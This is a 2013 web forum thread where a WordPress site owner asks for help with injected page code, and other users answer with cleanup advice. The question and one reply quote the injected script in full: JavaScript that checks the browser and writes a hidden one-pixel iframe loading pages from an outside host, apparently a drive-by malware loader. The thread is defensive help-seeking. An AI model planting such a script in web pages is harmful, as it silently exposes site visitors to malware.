SitePoint Sponsor

User Tag List

Results 1 to 3 of 3
  1. #1
    SitePoint Addict
    Join Date
    May 2005
    Posts
    297
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

    site being hacked even after fresh install

    Hi guys,

    I'm having a bit of trouble with my site <snip/> it's trying to run a java applet, in the source code I can see the below is added to the bottom of the page:
    Code:
    <script type="text/javascript">
    function check(){var a=navigator.userAgent;if((a.search(/Win/)>0)&&((a.search(/MSIE/)>0)||(a.search(/Firefox/)>0)||(a.search(/Opera/)>0)))return 1;else return 0}if(check()){document.write("<iframe width=1 height=1 frameborder=0 src=http://www.ornavassovolley.it/efa/conf/table/index.php?out=1374679711></iframe>")}else{document.write("<iframe width=1 height=1 frameborder=0 src=http://www.ornavassovolley.it/gallery/index.html></iframe>")}
    </script>
    I've done a complete fresh install of the wordpress install and database which didn't fix it. Any idea on how I can fix this?

    Many thanks
    Last edited by Mittineague; Aug 28, 2013 at 07:39. Reason: please do NOT include links to sites with viruses

  2. #2
    From space with love silver trophy
    SpacePhoenix's Avatar
    Join Date
    May 2007
    Location
    Poole, UK
    Posts
    5,072
    Mentioned
    103 Post(s)
    Tagged
    0 Thread(s)
    1. Run an anti-virus scan on both the server and any computer you use to access the site.
    2. Run an anti-malware/spyware scan on both the server and any computer you use to access the site.
    3. Once the above state that there is nothing found, change all passwords for ftp, admin panels, etc with strong passwords.
    4. Make sure that the version of wordpress that you're installing is the latest stable version and for the time being don't install any plugins, it could be that one of the plugins you were using might have a security hole.
    Community Team Advisor
    Forum Guidelines: Posting FAQ Signatures FAQ Self Promotion FAQ
    Help the Mods: What's Fluff? Report Fluff/Spam to a Moderator

  3. #3
    SitePoint Member
    Join Date
    Aug 2013
    Posts
    1
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Quote Originally Posted by aaron118 View Post
    Hi guys,

    I'm having a bit of trouble with my site <snip/> it's trying to run a java applet, in the source code I can see the below is added to the bottom of the page:
    Code:
    <script type="text/javascript">
    function check(){var a=navigator.userAgent;if((a.search(/Win/)>0)&&((a.search(/MSIE/)>0)||(a.search(/Firefox/)>0)||(a.search(/Opera/)>0)))return 1;else return 0}if(check()){document.write("<iframe width=1 height=1 frameborder=0 src=http://www.ornavassovolley.it/efa/conf/table/index.php?out=1374679711></iframe>")}else{document.write("<iframe width=1 height=1 frameborder=0 src=http://www.ornavassovolley.it/gallery/index.html></iframe>")}
    </script>
    I've done a complete fresh install of the wordpress install and database which didn't fix it. Any idea on how I can fix this?

    Many thanks
    You can't fix it.

    The problem is not on your website but on the underlying web host server. I guess someone has hacked the http server or similar. Anyway, it appeared that all sites on the web server you're using had the same problem (including one of mine). I reported this last night and it appears to have been dealt with this morning between 6am & 7am.

    Must admit I spent 3 hours trawling through my website code before accepting that it wasn't in my site so it must be the server.


Bookmarks

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •